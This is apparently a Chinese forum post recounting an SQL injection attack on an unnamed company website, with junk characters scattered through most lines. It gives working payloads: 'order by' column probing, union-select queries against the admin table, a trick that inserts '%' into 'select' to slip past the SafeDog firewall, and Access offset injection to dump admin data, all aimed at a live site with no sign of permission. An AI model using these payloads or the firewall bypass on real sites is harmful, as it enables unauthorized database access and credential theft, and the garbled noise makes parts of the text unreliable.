打开网站,一个企业站。# f/ T) H- V9 ~; ^0 R& T
1 U) t4 G& z0 b9 [! g
' ]. b2 _. s# b" p# L+ {% k. J
顺手加个admin
6 V) L+ D, b1 K$ D
; i) ?- R' c+ y5 g
4 y1 q- i( t _1 _4 J* L* V6 d默认后台。
8 T; q. ^. r8 H h v' A- B7 R回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
" Q/ k7 D. N# b8 E4 T b! m) n+ I& ~) z" ?. O, s* m
9 h5 G( j3 E( ~) x$ t$ q
) \* J3 L* Z" p1 Z所以就不用御剑扫了,待会直接封IP。
5 w0 p: Y* n2 W- i ?( n- S
# N, G* Q1 u+ D; a; ]) C用order by语句判断是否存在注入。
* i X, K7 w. ?9 k' z, y% E, s! ihttp://www.xxx.com /product_show.asp?id=997 order by 17 a8 U5 L% ^8 U$ c
http://www.xxx.com /product_show.asp?id=997 order by 100
3 p4 I- ~( @! q现在存在注入,经测试后发现是9个字段。( v. Q U% n# B) J7 H/ q2 N
1 V8 D* O' j" F- m6 }' T接下来进行联合查询,猜是否存在admin表。) K: A5 B3 {) c @% g. h
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
2 z' T, J3 t) {8 v0 M, S8 o+ A3 J: g
/ i! H3 ]+ j4 U& K. M, x0 V
2 j9 o3 J0 ]+ Y- t- o0 D R在select中间加个%,se%lect绕过安全狗。
0 H: [4 z. G8 K# a, `, v- _6 D
/ n& C, g d) U$ {, B: b
$ ^& P* X/ N/ z! _发现存在admin表,然后开始手工猜常用的字段。
! V, N* m# L; K* k$ ]( h% q" S- @纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
) C) U$ J# Q; j) S6 ^, e- S 0 ^# G) Q8 O7 `5 R
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
5 S* t# k& K" C( H0 k, T
. E9 |6 C" ?, i( @9 j科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
0 w0 U4 \+ T$ d4 d! Dhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin' ~8 n- G- @8 U3 E. e- Z* g Y ?
好了,敏感内容出显了。8 v( n' R+ {9 Z! R
" ^/ F! c+ | d, Y3 [' b7 f7 w1 h9 J6 \" }) O2 h, q8 [6 p
! A$ x9 S; M! \, m# r) C) o
|